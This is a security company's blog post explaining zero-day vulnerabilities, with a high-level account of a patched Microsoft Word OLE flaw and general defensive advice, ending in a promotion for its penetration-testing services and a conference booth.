Our networked systems, be they computers, databases, phones, or other devices, are an endless battlefield. Zero-day exploits have been buzzing in the news in the wake of the Wikileaks concerns, where a number of such exploits had been posted where any who were interested could learn illegally about how to use them. Many are worried about how this impacts their own security and privacy.
What exactly is a zero-day exploit?
A zero-day exploit, vulnerability, or threat is a flaw in the system that is so new that the developers have not had time to create a patch to fix it, yet. “New,” however, is only relative to how long the defenders and developers have known about it; such flaws can exist for many years before they are discovered by either the developers, penetration-testers, or unfortunately, an attacker. It is a constant race to locate such vulnerabilities before a hacker does, as they are hidden holes in the wall of defense.
These flaws and holes will exist until they are either patched, or the code itself is removed or overwritten by upgrades. Fortunately, many of the particular exploits within the “Vault 7” documents have already been fixed by patches, some even before being posted publicly due to software companies being alerted to the exploits beforehand. Provided users themselves have updated their systems with the new patches, those particular exploits have already been rendered obsolete.
More flaws, exploits, and vulnerabilities will inevitably exist, however, simply by the nature of software development and the interaction of so many different systems. The battle to defend still continues, as it always has.
What kind of threats are they?
An example zero-day vulnerability is one that was found in Microsoft Word earlier this month, which has since been patched. The code which controlled the Object Linking and Embedding (OLE) within Microsoft Office was taken advantage of, where just by opening an attached RTF file (specifically .doc extensions), the program would connect to a remote server and automatically download executable files which allowed hackers to have full access to the computer. The user, meanwhile, only saw a fake Word document, unaware that malware had already been installed. This vulnerability was found by McAfee in early April, who proceeded to alert Microsoft as well as all users in an effort to quickly form protections against the exploit; the discovery, however, only came after the exploit had been in use for a few months by attackers.
Others involve open ports created by a phone app, embedded Flash files, or even executing code through downloaded TrueType font files. Anything that parses code is vulnerable, whether downloaded or accessed through a browser, even just by opening a webpage.
What is scary about a zero-day is that there is no defense yet available, no patch yet released to protect a system from its flaw. It is a new and open hole in your security that may have already been taken advantage of without your knowing.
How do I defend against a Zero-Day?
- Basic safe computing tips apply: ignore unsolicited emails, be wary of suspicious links and attachments, use secure connections, use a firewall, and avoid untrustworthy downloads.
- Practice caution when opening or downloading any new file or software.
- Use Antivirus: some are able to catch suspicious programs and malware that look similar to known threats, in addition to blacklisting the trojans, viruses, and malware that is recognized.
- Use Whitelisting: prevent anything from running without explicit admin authorization. Block unauthorized executable files.
- Patch regularly. Keep your systems up-to-date, because the moment a zero-day exploit is known, it remains a threat on your system until you have patched it, if a patch yet exists. If a patch exists, there may be hackers out there who will scan for those who have not patched yet and make use of the hole before you update your system.
- If possible: penetration test!
This is a race between the bad guys and the good guys. The penetration testers and security teams are the line of defense, searching for any holes in the system, be it within an internal network, wireless network, mobile apps, or the web. If you are interested in having your company or software penetration-tested, Tiro Security offers quality services at competitive prices; contact us to start a conversation about this front-line defense.
We are going to be attending the Ninth ISSA Conference at the Universal City Hilton on the 19th May so please come join us at our booth. You can buy tickets at: https://summit.issala.org/ and use our code for 20% off: LRNW